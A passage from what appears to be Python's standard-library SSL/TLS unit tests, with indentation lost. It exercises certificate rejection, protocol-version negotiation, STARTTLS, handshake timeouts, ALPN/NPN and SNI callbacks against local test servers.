"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"keycert.pem")
server = ThreadedEchoServer(SIGNED_CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=SIGNING_CA, chatty=False,
connectionchatty=False)
with server, \
closing(socket.socket()) as sock, \
closing(ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except socket.error as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = ssl.wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# disable all but TLS 1.3
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], [
'TLS13-AES-256-GCM-SHA384',
'TLS13-CHACHA20-POLY1305-SHA256',
'TLS13-AES-128-GCM-SHA256',
])
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
